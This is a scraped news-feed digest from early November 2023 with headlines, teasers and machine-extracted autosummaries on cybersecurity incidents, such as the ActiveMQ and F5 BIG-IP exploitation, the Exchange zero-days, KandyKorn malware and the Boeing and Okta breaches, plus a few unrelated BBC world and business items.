            New Microsoft Exchange zero-days allow RCE, data theft attacks

            exploits
            2023-11-03 https://www.bleepingcomputer.com/news/microsoft/new-microsoft-exchange-zero-days-allow-rce-data-theft-attacks/
            Microsoft Exchange is impacted by four zero-day vulnerabilities that attackers can exploit remotely to execute arbitrary code or disclose sensitive information on affected installations. [...]

            Autosummary: It should be noted, though, that cybercriminals have many ways to obtain Exchange credentials, including brute-forcing weak passwords, performing phishing attacks, purchasing them, or acquiring them from info-stealer logs.


            Apache ActiveMQ vulnerability used in ransomware attacks

            exploits ransomware
            2023-11-03 https://www.malwarebytes.com/blog/business/2023/11/apache-activemq-vulnerability-used-in-ransomware-attacks
            A remote code execution vulnerability in Apache ActiveMQ is being used by the HelloKitty ransomware group.

            Autosummary: To successfully exploit this vulnerability, three things are required: (1) network access; (2) a manipulated OpenWire “command” (used to instantiate an arbitrary class on the classpath with a String parameter); and (3) a class on the classpath which can execute arbitrary code simply by instantiating it with a String parameter. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Apache ActiveMQ® is “middleware”, a popular open source, multi-protocol, Java-based message broker.


            Island names Matt Fairbanks as CMO and Ellen Roeckl as CCO

            financial
            2023-11-03 https://www.helpnetsecurity.com/2023/11/03/island-cmo-cco/

            Island has announced the addition of Matt Fairbanks to its executive team as Chief Marketing Officer (CMO) and the appointment of Ellen Roeckl, Island’s former head of marketing, as the company’s first Chief Communications Officer (CCO). Fairbanks is tasked with global expansion of pipeline and product leadership; Roeckl will drive category awareness and communicate Island’s vision, capabilities, and perspectives to the company’s growing community of stakeholders and influencers. Fairbanks, most recently CMO at Sophos, is … More


            Autosummary: Fairbanks, most recently CMO at Sophos, is an accomplished IT and cybersecurity veteran with extensive experience leading marketing for some of the world’s most respected technology and cybersecurity brands, including McAfee, Citrix, Symantec, and Veritas.


            The Week in Ransomware - November 3rd 2023 - Hive's Back

            exploits ransomware
            2023-11-03 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-3rd-2023-hives-back/
            Over the past couple of months, ransomware attacks have been escalating as new operations launch, old ones return, and existing operations continue to target the enterprise. [...]

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @malwrhunterteam, @demonslay335, @billtoulas, @serghei, @Ionut_Ilascu, @LawrenceAbrams, @fwosar, @BleepinComputer, @SecurityJoes, @rivitna2, @BushidoToken, @AlvieriD, @rapid7, @BradSmi, @uptycs, @pcrisk, @PogoWasRight, and @BrettCallow. Finally, new research was released this week about ransomware, including: Hive's possible return is particularly interesting, as they were previously disrupted after the FBI hacked Hive's servers and seized infrastructure.


            ZDI discloses four zero-day flaws in Microsoft Exchange

            exploits
            2023-11-03 https://securityaffairs.com/153599/hacking/microsoft-exchange-zero-day-flaws.html

            Researchers disclosed four zero-day flaws in Microsoft Exchange that can be remotely exploited to execute arbitrary code or disclose sensitive information on vulnerable installs. Trend Micro’s Zero Day Initiative (ZDI) disclosed four zero-day vulnerabilities in Microsoft Exchange that can be remotely exploited by an authenticated attacker to execute arbitrary code or disclose sensitive information on […]


            Autosummary: ZDI discloses four zero-day flaws in Microsoft Exchange, by Pierluigi Paganini, November 03, 2023. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange.


            Cybersecurity workforce shortages: 67% report people deficits

            ciber
            2023-11-02 https://www.helpnetsecurity.com/2023/11/02/cybersecurity-workforce-shortages-isc2/

            The global cybersecurity workforce has reached 5.5 million people, an 8.7% increase from 2022, representing 440,000 new jobs, according to ISC2. While this is the highest workforce ever recorded, the report shows that demand is still outpacing the supply. The cybersecurity workforce gap has reached a record high, with 4 million professionals needed to safeguard digital assets adequately. The research also finds new challenges impacting professionals in the field, including economic uncertainty, artificial intelligence, fragmented … More


            Autosummary: 47% of respondents experienced cutbacks, which included budget cuts, layoffs and hiring and promotion freezes. 35% faced cuts to cybersecurity training programs, vital for skills development and workforce growth. Two-thirds of respondents say that cutbacks have negatively impacted their productivity and team morale and increased their workload. 57% said their response to threats has been inhibited by cutbacks, and 52% have seen an increase in insider risk-related incidents. 31% of professionals believe that cutbacks will continue into 2024, and 70% expect those cutbacks to include layoffs. Uncovering effective hiring, retention and team-building practices: 47% of respondents have no or minimal knowledge of artificial intelligence (AI); 47% see cloud computing security as the most sought-after skill for career advancement; 45% of respondents foresee AI as their top challenge over the next two years. “While we celebrate the record number of new cybersecurity professionals entering the field, the pressing reality is that we must double this workforce to adequately protect organizations and their critical assets,” said ISC2 CEO Clar Rosso.


            6 steps to accelerate cybersecurity incident response

            ciber
            2023-11-02 https://www.helpnetsecurity.com/2023/11/02/accelerate-cybersecurity-incident-response/

            Modern security tools continue to improve in their ability to defend organizations’ networks and endpoints against cybercriminals. But the bad actors still occasionally find a way in. Security teams must be able to stop threats and restore normal operations as quickly as possible. That’s why it’s essential that these teams not only have the right tools but also understand how to effectively respond to an incident. Resources like an incident response template can be customized … More


            Autosummary: Bonus step: Investigation. Goal: Determine who, what, when, where, why, how. At this stage it is worth noting another important aspect of IR: investigation. Leveraging a templated incident response plan to establish roles and responsibilities for all participants — security leaders, operations managers, help desk teams, identity and access managers, as well as audit, compliance, communications, and executives — can ensure efficient coordination. During the identification phase, you will document all indicators of compromise (IOCs) gathered from alerts, such as compromised hosts and users, malicious files and processes, new registry keys, and more. This isn’t always possible, however, so you may need to take measures like patching, changing passwords, killing specific services, and more. Now that the incident is comfortably behind you, it’s time to reflect on each major IR step and answer key questions; there are plenty of questions and aspects that should be asked and reviewed, and below are a few examples: Identification: How long did it take to detect the incident after the initial compromise occurred? With the containment phase complete, you can move to eradication, which can be handled through either disk cleaning, restoring to a clean backup, or full disk reimaging. Short-term: This includes steps you might take in the moment, like shutting down systems, disconnecting devices from the network, and actively observing the threat actor’s activities. Also, using an endpoint detection and response (EDR) platform or extended detection and response (XDR) tool with centralized control will let you quickly take defensive actions like isolating machines, disconnecting them from the network, and executing counteracting commands at scale.


            Cybersecurity habits and behaviors executives need to be aware of

            ciber
            2023-11-02 https://www.helpnetsecurity.com/2023/11/02/poor-executive-cybersecurity/

            Top executives — the employee group most targeted by threat actors — are frequently provided unfettered access to valuable data sources and networked assets, according to Ivanti. Executives access unauthorized work data While 96% of leaders say they are at least moderately supportive and invested in their organization’s cybersecurity mandate, the reality is that 49% of CXOs have requested to bypass one or more security measures in the past year. Although security leaders are aware … More

            The post Cybersecurity habits and behaviors executives need to be aware of appeared first on Help Net Security.

            "

            Autosummary: The report outlines steps businesses and security professionals can leverage to close the executive conduct gap including conducting audits, prioritizing remediation for the most common risks, conducting gamified security training sessions, and implementing “white glove” security programs. "


            Iran's MuddyWater Targets Israel in New Spear-Phishing Cyber Campaign

            financial
            2023-11-02 https://thehackernews.com/2023/11/irans-muddywater-targets-israel-in-new.html
            The Iranian nation-state actor known as MuddyWater has been linked to a new spear-phishing campaign targeting two Israeli entities to ultimately deploy a legitimate remote administration tool from N-able called Advanced Monitoring Agent. Cybersecurity firm Deep Instinct, which disclosed details of the attacks, said the campaign "exhibits updated TTPs to previously reported MuddyWater activity," "

            Autosummary: "


            FIRST Announces CVSS 4.0 - New Vulnerability Scoring System

            exploits
            2023-11-02 https://thehackernews.com/2023/11/first-announces-cvss-40-new.html
            The Forum of Incident Response and Security Teams (FIRST) has officially announced CVSS v4.0, the next generation of the Common Vulnerability Scoring System standard, more than eight years after the release of CVSS v3.0 in June 2015. "This latest version of CVSS 4.0 seeks to provide the highest fidelity of vulnerability assessment for both industry and the public," FIRST said in a statement. "

            Autosummary: "


            HelloKitty Ransomware Group Exploiting Apache ActiveMQ Vulnerability

            exploits ransomware
            2023-11-02 https://thehackernews.com/2023/11/hellokitty-ransomware-group-exploiting.html
            Cybersecurity researchers are warning of suspected exploitation of a recently disclosed critical security flaw in the Apache ActiveMQ open-source message broker service that could result in remote code execution. "In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations," cybersecurity firm Rapid7 disclosed in a "

            Autosummary: Both the MSI files contain a 32-bit .NET executable named dllloader that, in turn, loads a Base64-encoded payload called EncDLL that functions akin to ransomware, searching and terminating a specific set of processes before commencing the encryption process and appending the encrypted files with the ".locked" extension. "


            Okta data breach exposed personal information of employees

            financial
            2023-11-02 https://www.bleepingcomputer.com/news/security/okta-data-breach-exposed-personal-information-of-employees/
            Okta is warning nearly 5,000 employees that the company was impacted by a third-party data breach that exposed personal information. [...] "

            Autosummary: The file contained the following information on current and former Okta employees and their dependents: full names, Social Security Numbers (SSNs), and health or medical insurance plan number. Okta learned about the breach on October 12, 2023, when Rightway disclosed the attack, and immediately launched an investigation to determine the extent of the compromise. "


            Attackers exploiting Apache ActiveMQ flaw to deliver ransomware (CVE-2023-46604)

            exploits ransomware
            2023-11-02 https://www.helpnetsecurity.com/2023/11/02/cve-2023-46604-ransomware/

            Ransomware-wielding attackers are trying to break into servers running outdated versions of Apache ActiveMQ by exploiting a recently fixed vulnerability (CVE-2023-46604). “Beginning Friday, October 27, Rapid7 Managed Detection and Response (MDR) identified suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two different customer environments. In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations,” Rapid7 researchers shared on Wednesday. “Based on the ransom note and … More

            The post Attackers exploiting Apache ActiveMQ flaw to deliver ransomware (CVE-2023-46604) appeared first on Help Net Security.

            "

            Autosummary: ActiveMQ supports a variety of protocols, including OpenWire (the native wire format of ActiveMQ), MQTT (messaging protocol for IoT), AMQP (protocol for business messaging and IoT device management), REST, STOMP, and WebSockets. "


            SAIC evolves its AI and ML ecosystem to improve government mission outcomes

            government
            2023-11-02 https://www.helpnetsecurity.com/2023/11/02/saic-tenjin/

            SAIC announced new offerings for Tenjin and additional features for Koverse. “The new offerings and features for SAIC’s Data Science Suite ensure the right people have access to the right data at the right time to gain actionable insights for decision-making and problem solving across multiple domains,” said Andy Henson, VP, Digital Innovation Factory at SAIC. The innovative Tenjin offerings enable organizations to handle and store their complex sensitive data securely from the enterprise to … More

            The post SAIC evolves its AI and ML ecosystem to improve government mission outcomes appeared first on Help Net Security.

            "

            Autosummary: "


            Action1 platform updates automate vulnerability remediation

            exploits
            2023-11-02 https://www.helpnetsecurity.com/2023/11/02/action1-vulnerability-detection/

            Action1 announced its latest release. Global enterprises navigating complex environments can now ensure rapid adoption of Action1’s platform within their organization for reduced Mean-Time-To-Remediate (MTTR) while eliminating gaps in their remediation processes. Key features: Automation and cost savings. Enterprises can reduce the time required for solution adoption by instantly mapping automated vulnerability remediation workflows to their existing IT infrastructure organization-wide in a few minutes. Single Sign-On (SSO). Customers can implement more secure and simplified access … More

            The post Action1 platform updates automate vulnerability remediation appeared first on Help Net Security.

            "

            Autosummary: “Enterprise IT teams often struggle with manually organizing their endpoints within their remediation solution, which can drag on for months, while leaving their organization exposed to risks arising from gaps in their remediation strategies,” said Mike Walters, President of Action1. "


            Suspected exploitation of Apache ActiveMQ flaw CVE-2023-46604 to install HelloKitty ransomware

            exploits ransomware
            2023-11-02 https://securityaffairs.com/153454/hacking/apache-activemq-cve-2023-46604-hellokitty-ransomare.html

            Rapid7 researchers warn of the suspected exploitation of a recently disclosed critical security flaw (CVE-2023-46604) in Apache ActiveMQ. Cybersecurity researchers at Rapid7 are warning of the suspected exploitation of the recently disclosed critical vulnerability CVE-2023-46604 in Apache ActiveMQ. Apache ActiveMQ is an open-source message broker software that serves as a message-oriented middleware (MOM) […]

            The post Suspected exploitation of Apache ActiveMQ flaw CVE-2023-46604 to install HelloKitty ransomware appeared first on Security Affairs.

            "

            Autosummary: Legacy OpenWire Module 5.8.0 before 5.15.16. Since the bug’s disclosure, a proof-of-concept (PoC) exploit code and additional technical specifics have been made publicly available, with Rapid7 noting that the behavior it observed in the two victim networks is “similar to what we would expect from the exploitation of CVE-2023-46604.” "


            Boeing confirmed its services division suffered a cyberattack

            ciber
            2023-11-02 https://securityaffairs.com/153431/cyber-crime/boeing-confirms-lockbit-cyber-attack.html

            Boeing confirmed it is facing a cyber incident that hit its global services division; the company pointed out that flight safety isn’t affected. The Boeing Company, commonly known as Boeing, is one of the world’s largest aerospace manufacturers and defense contractors. In 2022, Boeing recorded $66.61 billion in sales; the aerospace giant has 156,000 (2022). Last week, the […]

            The post Boeing confirmed its services division suffered a cyberattack appeared first on Security Affairs.

            "

            Autosummary: “Boeing, the 60 billion Company, together with its subsidiaries, designs, develops, manufactures, sells, services, and supports commercial jetliners, military aircraft, satellites, missile defense, human space flight, and launch systems and services worldwide.” "


            Migrant caravan heading through Mexico to US grows in numbers

            latam
            2023-11-02 https://www.bbc.co.uk/news/world-latin-america-67296361?at_medium=RSS&at_campaign=KARANGA
            The size of the group of migrants which set off from Mexico's southern border on Monday is increasing. "

            Autosummary: "


            Mortgage giant Mr. Cooper hit by cyberattack impacting IT systems

            ciber
            2023-11-02 https://www.bleepingcomputer.com/news/security/mortgage-giant-mr-cooper-hit-by-cyberattack-impacting-it-systems/
            U.S. mortgage lending giant Mr. Cooper was breached in a cyberattack that caused the company to shut down IT systems, including access to their online payment portal. [...] "

            Autosummary: "On October 31, 2023, Mr. Cooper determined that the company had experienced a cybersecurity incident in which an unauthorized third party gained access to certain technology systems," reads a notice of cyber security incident on Mr. Cooper’s website. "


            HelloKitty ransomware now exploiting Apache ActiveMQ flaw in attacks

            exploits ransomware
            2023-11-02 https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-now-exploiting-apache-activemq-flaw-in-attacks/
            A remote code execution (RCE) flaw impacting Apache ActiveMQ has been under active exploitation by threat actors who use HelloKitty ransomware payloads. [...] "

            Autosummary: Vulnerable versions range between 5.15 and 5.18, including Legacy OpenWire Module versions, and are fixed in versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3. "


            Boeing confirms cyberattack amid LockBit ransomware claims

            exploits ransomware ciber
            2023-11-02 https://www.bleepingcomputer.com/news/security/boeing-confirms-cyberattack-amid-lockbit-ransomware-claims/
            Aerospace giant Boeing is investigating a cyberattack that impacted its parts and distribution business after the LockBit ransomware gang claimed that they breached the company's network and stole data. [...] "

            Autosummary: Boeing page on LockBit data leak site (BleepingComputer). The LockBit ransomware-as-a-service (RaaS) operation surfaced in September 2019, with notable victims including the Continental automotive giant, the UK Royal Mail, the Italian Internal Revenue Service, and the City of Oakland. "


            Okta hit by third-party data breach exposing employee information

            financial
            2023-11-02 https://www.bleepingcomputer.com/news/security/okta-hit-by-third-party-data-breach-exposing-employee-information/
            Okta is warning nearly 5,000 current and former employees that their personal information was exposed after a third-party vendor was breached. [...] "

            Autosummary: The file contained the following information on current and former Okta employees and their dependents: full names, Social Security Numbers (SSNs), and health or medical insurance plan number. Okta learned about the breach on October 12, 2023, when Rightway disclosed the attack, and immediately launched an investigation to determine the extent of the compromise. "


            Okta discloses a new data breach after a third-party vendor was hacked

            financial
            2023-11-02 https://securityaffairs.com/153478/data-breach/okta-data-breach-third-party-vendor.html

            Okta warns approximately 5,000 employees that their personal information was compromised due to a third-party vendor data breach. Cloud identity and access management solutions provider Okta warns nearly 5,000 employees that their personal information was exposed due to a data breach suffered by the third-party vendor Rightway Healthcare. According to the data breach notification, Rightway […]

            The post Okta discloses a new data breach after a third-party vendor was hacked appeared first on Security Affairs.

            "

            Autosummary: Okta discloses a new data breach after a third-party vendor was hacked. Pierluigi Paganini, November 02, 2023. Okta warns approximately 5,000 employees that their personal information was compromised due to a third-party vendor data breach. "


            Atlassian warns of exploit for Confluence data wiping bug, get patching

            exploits
            2023-11-02 https://www.bleepingcomputer.com/news/security/atlassian-warns-of-exploit-for-confluence-data-wiping-bug-get-patching/
            Atlassian warned admins that a public exploit is now available for a critical Confluence security flaw that can be used in data destruction attacks targeting Internet-exposed and unpatched instances. [...] "

            Autosummary: If you can't immediately patch your Confluence instances, you can also remove known attack vectors by blocking access on the following endpoints by modifying the /<confluence-install-dir>/confluence/WEB-INF/web.xml as explained in the advisory and restarting the vulnerable instance: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action. "These mitigation actions are limited and not a replacement for patching your instance; you must patch as soon as possible," Atlassian warned. "


            Ace Hardware says 1,202 devices were hit during cyberattack

            ciber
            2023-11-02 https://www.bleepingcomputer.com/news/security/ace-hardware-says-1-202-devices-were-hit-during-cyberattack/
            Ace Hardware confirmed that a cyberattack is preventing local stores and customers from placing orders as the company works to restore 196 servers. [...] "

            Autosummary: "As a result of this incident, many of our key operating systems, including ACENET, our Warehouse Management Systems, the Ace Retailer Mobile Assistant (ARMA), Hot Sheets, Invoices, Ace Rewards and the Care Center's phone system have been interrupted or suspended." The company stated that it has engaged with a group of IT experts to help them restore the impacted systems, but because they deal with "a fast-moving, dynamic situation," details on the process and system status cannot be conveyed with accuracy. "


            New macOS "KandyKorn" malware targets cryptocurrency engineers

            exploits
            2023-11-02 https://www.bleepingcomputer.com/news/security/new-macos-kandykorn-malware-targets-cryptocurrency-engineers/
            A new macOS malware dubbed "KandyKorn" has been spotted in a campaign attributed to the North Korean Lazarus hacking group, targeting blockchain engineers of a cryptocurrency exchange platform. [...] "

            Autosummary: Specifically, HLOADER performs the following operations upon launch: renames itself from Discord to MacOS.tmp; renames the legitimate Discord binary from .lock to Discord; executes both Discord and .log using NSTask.launchAndReturnError; renames both files back to their initial names. File renaming scheme used for persistence (Elastic). KandyKorn is an advanced final-stage payload that enables Lazarus to access and steal data from the infected computer. KandyKorn's command execution code (Elastic). In summary, KandyKorn is a particularly stealthy backdoor capable of data retrieval, directory listing, file upload/download, secure deletion, process termination, and command execution. "


            BlackCat ransomware claims breach of healthcare giant Henry Schein

            exploits ransomware
            2023-11-02 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-claims-breach-of-healthcare-giant-henry-schein/
            The BlackCat (ALPHV) ransomware gang claims it breached the network of healthcare giant Henry Schein and stole dozens of terabytes of data, including payroll data and shareholder information. [...] "

            Autosummary: "Despite ongoing discussions with Henry's team, we have not received any indication of their willingness to prioritize the security of their clients, partners, and employees, let alone protect their own network," the threat actors said. "


            Mysterious Kill Switch Disrupts Mozi IoT Botnet Operations

            industry
            2023-11-02 https://thehackernews.com/2023/11/mysterious-kill-switch-disrupts-mozi.html
            The unexpected drop in malicious activity connected with the Mozi botnet in August 2023 was due to a kill switch that was distributed to the bots. "First, the drop manifested in India on August 8," ESET said in an analysis published this week. "A week later, on August 16, the same thing happened in China. While the mysterious control payload – aka kill switch – stripped Mozi bots of most "

            Autosummary: "


            Public exposure of data breaches is becoming inevitable

            financial
            2023-11-01 https://www.helpnetsecurity.com/2023/11/01/public-data-exfiltration-exposure/

            Ransomware incidents are rising again as criminals use data exfiltration and supply chain attacks to maximize their leverage, according to Allianz. Allianz Commercial analysis of large cyber losses shows the number of cases in which data is exfiltrated is soaring, as is the number of incidents becoming public. Cyber breaches that are not detected and contained early can be 1,000 times more expensive than those that are. Companies’ cybersecurity priorities should include bolstering their detection and … More

            The post Public exposure of data breaches is becoming inevitable appeared first on Help Net Security.

            "

            Autosummary: “Today, if you have data exfiltration it will likely go public, and every company needs to be prepared for this,” says Rishi Baviskar, Global Head of Cyber Risk Consulting, Allianz Commercial. For example, the MOVEit mass cyberattack, which exploited a data transfer software product, impacting millions of individuals and thousands of companies, contributed to the increase in the frequency of claims in 2023 to date, affecting multiple policyholders simultaneously. “Double and triple extortion incidents – using a combination of encryption, data exfiltration and DDoS – to obtain money are not new but they are now more prevalent,” says Michael Daum, Global Head of Cyber Claims, Allianz Commercial. Threat actors embrace AI for faster, automated attacks: threat actors are now exploring ways to use AI to automate and accelerate attacks, creating more effective AI-powered malware, phishing, and voice simulation. "


            Ransomware attacks set to break records in 2023

            exploits
            2023-11-01 https://www.helpnetsecurity.com/2023/11/01/q3-2023-ransomware-attacks/

            Ransomware attacks continue at a record-breaking pace, with Q3 2023 global ransomware attack frequency up 11% over Q2 and 95% year-over-year (YoY), according to Corvus Insurance. In its Q2 2023 Global Ransomware Report, Corvus noted a significant resurgence in global ransomware attacks, which has continued through the third quarter. Now, with two months remaining in the year, the number of ransomware victims in 2023 has already surpassed what was observed for 2021 and 2022. If … More

            The post Ransomware attacks set to break records in 2023 appeared first on Help Net Security.

            "

            Autosummary: Government agencies – The impetus behind these attacks was LockBit, which tripled its government victims from Q2 to Q3 (mostly cities and municipalities) (+95%). Additional industries that experienced spikes include manufacturing (+60%), oil and gas (+142%), and transportation, logistics and storage (+50%). "


            Alert: F5 Warns of Active Attacks Exploiting BIG-IP Vulnerability

            exploits
            2023-11-01 https://thehackernews.com/2023/11/alert-f5-warns-of-active-attacks.html
            F5 is warning of active abuse of a critical security flaw in BIG-IP less than a week after its public disclosure that could result in the execution of arbitrary system commands as part of an exploit chain. Tracked as CVE-2023-46747 (CVSS score: 9.8), the vulnerability allows an unauthenticated attacker with network access to the BIG-IP system through the management port to achieve code execution "

            Autosummary: "


            Bolivia severs diplomatic ties with Israel over Gaza war

            latam
            2023-11-01 https://www.bbc.co.uk/news/world-latin-america-67281584?at_medium=RSS&at_campaign=KARANGA
            The country's president accuses Israel of committing war crimes in Gaza and calls for a ceasefire. "

            Autosummary: "


            El Nino drought: Panama Canal cuts ship numbers further

            latam
            2023-11-01 https://www.bbc.co.uk/news/business-67281776?at_medium=RSS&at_campaign=KARANGA
            The new restrictions will likely further increase the cost of shipping goods around the world. "

            Autosummary: "


            WeWork plans to file for bankruptcy, reports say

            financial
            2023-11-01 https://www.bbc.co.uk/news/business-67281739?at_medium=RSS&at_campaign=KARANGA
            The troubled office-sharing firm declined to comment when contacted by the BBC. "

            Autosummary: "


            North Korean Hackers Targeting Crypto Experts with KANDYKORN macOS Malware

            exploits
            2023-11-01 https://thehackernews.com/2023/11/north-korean-hackers-tageting-crypto.html
            State-sponsored threat actors from the Democratic People's Republic of Korea (DPRK) have been found targeting blockchain engineers of an unnamed crypto exchange platform via Discord with a novel macOS malware dubbed KANDYKORN. Elastic Security Labs said the activity, traced back to April 2023, exhibits overlaps with the infamous adversarial collective Lazarus Group, citing an analysis of the "

            Autosummary: KANDYKORN, which is the final-stage payload, is a full-featured memory resident RAT with built-in capabilities to enumerate files, run additional malware, exfiltrate data, terminate processes, and run arbitrary commands. "


            SolarWinds and its CISO accused of misleading investors before major cyberattack

            ciber
            2023-11-01 https://www.malwarebytes.com/blog/news/2023/11/solarwinds-and-its-ciso-accused-of-misleading-investors-before-major-cyberattack
            The SEC has announced charges against SolarWinds and its CISO for fraud and internal control failures related to the company's cybersecurity. "

            Autosummary: "


            Iranian Cyber Espionage Group Targets Financial and Government Sectors in Middle East

            financial government
            2023-11-01 https://thehackernews.com/2023/11/iranian-cyber-espionage-group-targets.html
            A threat actor affiliated with Iran's Ministry of Intelligence and Security (MOIS) has been observed waging a sophisticated cyber espionage campaign targeting financial, government, military, and telecommunications sectors in the Middle East for at least a year. Israeli cybersecurity firm Check Point, which discovered the campaign alongside Sygnia, is tracking the actor under the name Scarred "

            Autosummary: Victims of the operation span various countries such as Saudi Arabia, the United Arab Emirates, Jordan, Kuwait, Oman, Iraq, and Israel. "


            British Library suffers major outage due to cyberattack

            ciber
            2023-11-01 https://securityaffairs.com/153309/hacking/british-library-cyber-attack.html

            Last weekend, the British Library suffered a cyberattack that caused a major IT outage, impacting many of its services. The British Library is facing a major outage that impacts the website and many of its services following a cyber attack that took place on October 28. The British Library is the national library of the […]

            The post British Library suffers major outage due to cyberattack appeared first on Security Affairs.

            "

            Autosummary: "An attack that follows the one suffered on 28 October by the @torontolibrary 🇨🇦" pic.twitter.com/GpBUoZgoRG — Claudio (@sonoclaudio) October 31, 2023. Pierluigi Paganini (SecurityAffairs – hacking, British Library) "


            Luis Díaz: Colombians march for release of footballer's father

            latam
            2023-11-01 https://www.bbc.co.uk/news/world-latin-america-67284202?at_medium=RSS&at_campaign=KARANGA
            The father of Liverpool footballer Luis Díaz was kidnapped by armed men in his hometown in Colombia. "

            Autosummary: "


            Mozi malware botnet goes dark after mysterious use of kill-switch

            exploits
            2023-11-01 https://www.bleepingcomputer.com/news/security/mozi-malware-botnet-goes-dark-after-mysterious-use-of-kill-switch/
            Mozi malware botnet activity faded away in August after a mysterious unknown party sent a payload on September 27, 2023, that triggered a kill switch to deactivate all bots. [...] "

            Autosummary: "


            Hackers exploit recent F5 BIG-IP flaws in stealthy attacks

            exploits
            2023-11-01 https://www.bleepingcomputer.com/news/security/hackers-exploit-recent-f5-big-ip-flaws-in-stealthy-attacks/
            F5 is warning BIG-IP admins that devices are being breached by "skilled" hackers exploiting two recently disclosed vulnerabilities to erase signs of their access and achieve stealthy code execution. [...] "

            Autosummary: Impacted and fixed versions are given below:
            17.1.0 (affected), fixed on 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG and later
            16.1.0 – 16.1.4 (affected), fixed on 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG and later
            15.1.0 – 15.1.10 (affected), fixed on 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG and later
            14.1.0 – 14.1.5 (affected), fixed on 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG and later
            13.1.0 – 13.1.5 (affected), fixed on 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG and later
            F5 has also published a script that helps mitigate the RCE flaw, the usage instructions for which can be found here. "


            CISA adds two F5 BIG-IP flaws to its Known Exploited Vulnerabilities catalog

            exploits
            2023-11-01 https://securityaffairs.com/153374/hacking/f5-big-ip-flaws-known-exploited-vulnerabilities-catalog.html

            US CISA added two vulnerabilities, tracked as CVE-2023-46747 and CVE-2023-46748, in BIG-IP to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerabilities CVE-2023-46747 and CVE-2023-46748 in BIG-IP to its Known Exploited Vulnerabilities catalog. CISA has added the two new vulnerabilities to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation. The two […]

            The post CISA adds two F5 BIG-IP flaws to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

            "

            Autosummary: CISA adds two F5 BIG-IP flaws to its Known Exploited Vulnerabilities catalog. Pierluigi Paganini, November 01, 2023. US CISA added two vulnerabilities, tracked as CVE-2023-46747 and CVE-2023-46748, in BIG-IP to its Known Exploited Vulnerabilities catalog. "


            Threat actors actively exploit F5 BIG-IP flaws CVE-2023-46747 and CVE-2023-46748

            exploits
            2023-11-01 https://securityaffairs.com/153338/security/cve-2023-46747-chained-f5-big-ip-attacks.html

            Experts warn that threat actors started exploiting the critical flaw CVE-2023-46747 in F5 BIG-IP installs less than five days after PoC exploit disclosure. F5 this week warned customers about a critical security vulnerability, tracked as CVE-2023-46747 (CVSS 9.8), that impacts BIG-IP and could result in unauthenticated remote code execution. The vulnerability resides in the configuration […]

            The post Threat actors actively exploit F5 BIG-IP flaws CVE-2023-46747 and CVE-2023-46748 appeared first on Security Affairs.

            "

            Autosummary: The vulnerability affects the following versions:
            Product | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score | Vulnerable component or feature
            BIG-IP (all modules) | 17.x | 17.1.0 | 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG | Critical | 9.8 | Configuration utility
            BIG-IP (all modules) | 16.x | 16.1.0 – 16.1.4 | 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG | Critical | 9.8 | Configuration utility
            BIG-IP (all modules) | 15.x | 15.1.0 – 15.1.10 | 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG | Critical | 9.8 | Configuration utility
            BIG-IP (all modules) | 14.x | 14.1.0 – 14.1.5 | 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG | Critical | 9.8 | Configuration utility
            BIG-IP (all modules) | 13.x | 13.1.0 – 13.1.5 | 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG | Critical | 9.8 | Configuration utility
            BIG-IQ Centralized Management "


            Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper

            Linux
            2023-11-01 https://securityaffairs.com/153341/malware/pro-hamas-group-bibi-linux-wiper.html

            A pro-Hamas hacker group is targeting Israeli entities using a new Linux-based wiper malware dubbed BiBi-Linux Wiper. During a forensics investigation, Security Joes Incident Response team discovered a new Linux Wiper malware they tracked as BiBi-Linux Wiper. Pro-Hamas hacktivist group used the wiper to destroy the infrastructure of Israeli companies. The researchers noticed that the malware […]

            The post Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper appeared first on Security Affairs.

            "

            Autosummary: Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper. Pierluigi Paganini, November 01, 2023. A pro-Hamas hacker group is targeting Israeli entities using a new Linux-based wiper malware dubbed BiBi-Linux Wiper. "


            Toronto Public Library outages caused by Black Basta ransomware attack

            exploits ransomware
            2023-11-01 https://www.bleepingcomputer.com/news/security/toronto-public-library-outages-caused-by-black-basta-ransomware-attack/
            The Toronto Public Library is experiencing ongoing technical outages due to a Black Basta ransomware attack. [...] "

            Autosummary: Since its launch, the threat actors have been responsible for a stream of attacks, including Capita, Sobeys, Knauf, and Yellow Pages Canada. Black Basta ransomware ransom note created on TPL workstations (Source: BleepingComputer). According to a TPL employee, the attack occurred overnight on October 27th, impacting numerous services Saturday morning. "


            New CVSS 4.0 vulnerability severity rating standard released

            exploits
            2023-11-01 https://www.bleepingcomputer.com/news/security/new-cvss-40-vulnerability-severity-rating-standard-released/
            The Forum of Incident Response and Security Teams (FIRST) has officially released CVSS v4.0, the next generation of its Common Vulnerability Scoring System standard, eight years after CVSS v3.0, the previous major version. [...] "

            Autosummary: "


            FSB arrests Russian hackers working for Ukrainian cyber forces

